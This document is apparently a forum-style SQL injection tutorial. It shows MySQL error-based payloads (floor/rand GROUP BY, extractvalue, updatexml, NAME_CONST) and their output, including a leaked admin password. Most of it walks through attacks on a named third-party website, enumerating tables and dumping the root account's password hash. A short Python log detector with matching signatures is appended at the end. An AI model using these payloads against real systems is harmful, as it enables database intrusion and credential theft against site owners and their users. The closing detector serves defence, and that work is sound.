1. Error-based injection via floor(). The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement can be used to trigger the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As can be seen, the MySQL version was successfully disclosed through the error message. To retrieve other data, replace the version() part of the statement with another query.

For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error uplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error uplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
| TEST          |
|---------------|
| 1             |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error uplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error uplicate column name '1
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error uplicate column name 'com_admanage
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error uplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
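As an added example (not code from the original page or either tutorial's author), here is a small Python detector for the four error-based primitives described in both sections above: the floor(rand()) GROUP BY duplicate-key trick, extractvalue(), updatexml(), and the NAME_CONST duplicate-column trick. It is run over constructed access-log lines; the common log format, the request paths and the signature names are all assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Each entry lists regexes that must ALL match a normalised query string for
# that error-based primitive to be reported.  Written for this example, not
# taken from the page.
SIGNATURES = {
    # floor(rand(0)*2) inside a GROUP BY -> "Duplicate entry ... for key 'group_key'"
    "floor_rand_groupby": [r"count\s*\(\s*\*\s*\)", r"floor\s*\(\s*rand\s*\(", r"group\s+by"],
    # extractvalue(1, concat(0x5c, ...)) -> "XPATH syntax error: '\...'"
    "extractvalue": [r"\bextractvalue\s*\("],
    # updatexml(1, concat(0x3a, ...), 1) -> "XPATH syntax error: ':...'"
    "updatexml": [r"\bupdatexml\s*\("],
    # two NAME_CONST() columns carrying the same name -> "Duplicate column name"
    "name_const_dup_column": [r"name_const\s*\(.*name_const\s*\("],
}

def normalise(raw: str) -> str:
    """URL-decode ('+' and %xx), drop /* */ comments, lowercase, collapse spaces."""
    text = unquote_plus(raw)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def classify(raw: str) -> list:
    """Return the names of every primitive whose signatures all match `raw`."""
    text = normalise(raw)
    return [name for name, pats in SIGNATURES.items()
            if all(re.search(p, text, re.S) for p in pats)]

def scan_access_log(lines) -> list:
    """Return (path, techniques) for each log line whose request matches."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and (techniques := classify(m.group(1))):
            hits.append((m.group(1).split("?", 1)[0], techniques))
    return hits

# Constructed sample access-log lines (common log format; the path is assumed).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /content/detail.php?id=330&sid=19 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /content/detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 90',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 95',
]

if __name__ == "__main__":
    for path, techniques in scan_access_log(SAMPLE_LOG):
        print(path, "->", ", ".join(techniques))
```

A match is a detection signal only; every technique on this page depends on the database error text reaching the client, so the fix is parameterised queries plus never returning raw database errors in responses.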